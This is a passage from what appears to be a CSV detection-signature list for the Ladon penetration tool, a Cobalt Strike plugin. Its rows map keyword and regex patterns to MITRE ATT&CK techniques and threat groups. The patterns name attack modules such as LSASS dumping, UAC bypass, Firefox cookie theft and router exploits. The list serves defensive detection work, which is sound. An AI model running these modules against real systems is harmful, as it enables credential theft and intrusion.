T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon at c:*",".{0,1000}Ladon\sat\sc\:.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon AtExec*",".{0,1000}Ladon\sAtExec.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon AutoRun*",".{0,1000}Ladon\sAutoRun.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon BadPotato*",".{0,1000}Ladon\sBadPotato.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon BypassUAC*",".{0,1000}Ladon\sBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon CheckDoor*",".{0,1000}Ladon\sCheckDoor.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon Clslog*",".{0,1000}Ladon\sClslog.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon CmdDll *",".{0,1000}Ladon\sCmdDll\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon cmdline*",".{0,1000}Ladon\scmdline.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon CVE-*",".{0,1000}Ladon\sCVE\-.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon DirList*",".{0,1000}Ladon\sDirList.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon DraytekExp*",".{0,1000}Ladon\sDraytekExp.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon DumpLsass*",".{0,1000}Ladon\sDumpLsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon EnableDotNet*",".{0,1000}Ladon\sEnableDotNet.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon EnumProcess*",".{0,1000}Ladon\sEnumProcess.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon EnumShare*",".{0,1000}Ladon\sEnumShare.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon Exploit*",".{0,1000}Ladon\sExploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FindIP *",".{0,1000}Ladon\sFindIP\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FirefoxCookie*",".{0,1000}Ladon\sFirefoxCookie.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon FirefoxHistory*",".{0,1000}Ladon\sFirefoxHistory.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - 